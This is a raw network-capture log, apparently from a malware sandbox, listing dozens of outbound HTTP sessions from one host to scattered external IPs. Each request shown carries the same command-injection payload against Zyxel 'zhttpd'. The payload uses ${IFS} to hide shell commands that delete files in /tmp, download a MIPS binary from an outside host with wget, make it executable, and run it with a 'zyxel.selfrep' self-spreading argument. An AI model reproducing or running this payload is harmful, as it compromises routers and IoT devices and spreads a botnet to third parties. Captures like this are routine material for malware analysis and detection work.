                                                Jan 28, 2024 10:16:32.921047926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6210192.168.2.2357824159.244.118.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921086073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6211192.168.2.2342490115.27.41.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921133995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6212192.168.2.233927677.46.48.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921170950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6213192.168.2.234481262.219.213.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921204090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6214192.168.2.233665444.34.213.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921235085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6215192.168.2.23407868.155.35.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921252966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6216192.168.2.2342940175.157.191.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921283007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6217192.168.2.234787452.117.213.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921313047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6218192.168.2.2340542190.12.134.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921329975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6219192.168.2.235575035.40.251.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921354055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6220192.168.2.235710696.130.124.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921367884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6221192.168.2.2337796211.170.50.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921385050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6222192.168.2.2339976149.109.43.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921437025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6223192.168.2.2338462190.251.27.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921448946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6224192.168.2.2339204113.46.228.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921478033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6225192.168.2.233303267.26.162.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921502113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6226192.168.2.2359384197.145.87.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921551943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6227192.168.2.2342042104.13.143.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921574116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6228192.168.2.234367070.229.94.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921586037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6229192.168.2.234714698.82.175.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921629906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6230192.168.2.2350616102.98.129.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921662092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6231192.168.2.2339594147.82.8.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921693087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6232192.168.2.2360158118.45.70.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921726942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6233192.168.2.2355576162.243.134.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921772003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6234192.168.2.233696277.94.21.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921783924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6235192.168.2.2357302196.239.170.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921802998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6236192.168.2.23359609.121.40.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921833038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6237192.168.2.2335002210.73.187.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921864033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6238192.168.2.234086471.184.188.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921884060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6239192.168.2.2345106117.38.44.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921926975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6240192.168.2.233702458.19.165.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921955109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6241192.168.2.235753692.72.51.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921999931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6242192.168.2.235480870.87.180.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922008038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6243192.168.2.2342320209.19.237.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922038078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6244192.168.2.234290670.23.214.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922044039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6245192.168.2.233593649.248.50.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922070980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6246192.168.2.2336062120.11.68.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922105074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6247192.168.2.2336396177.231.166.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922142982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6248192.168.2.2343674202.216.226.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922167063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6249192.168.2.234270217.127.26.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922197104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6250192.168.2.2336884151.80.36.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922209978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6251192.168.2.2358252115.198.55.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922233105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6252192.168.2.2352286209.216.178.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922260046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6253192.168.2.233468827.91.84.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922278881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6254192.168.2.235437674.208.197.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922313929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6255192.168.2.234338218.225.171.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922352076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6256192.168.2.233948020.136.98.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922379971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6257192.168.2.2334006126.12.2.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922415972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6258192.168.2.234235243.1.191.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922449112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6259192.168.2.2339628192.24.206.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922449112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6260192.168.2.23378925.231.22.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922482967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6261192.168.2.2359338140.244.232.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922516108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6262192.168.2.2336268189.142.26.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922538042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6263192.168.2.2347724218.138.250.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922557116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6264192.168.2.2346030171.189.7.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922573090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6265192.168.2.2336876116.42.176.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922601938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6266192.168.2.234680282.24.63.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922636032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6267192.168.2.2358526200.151.194.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922652960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6268192.168.2.234608059.133.85.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922663927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6269192.168.2.2354406106.158.203.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922692060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6270192.168.2.233987678.134.223.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.922722101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6271192.168.2.233935836.25.251.250443
                                                TimestampBytes transferredDirectionData
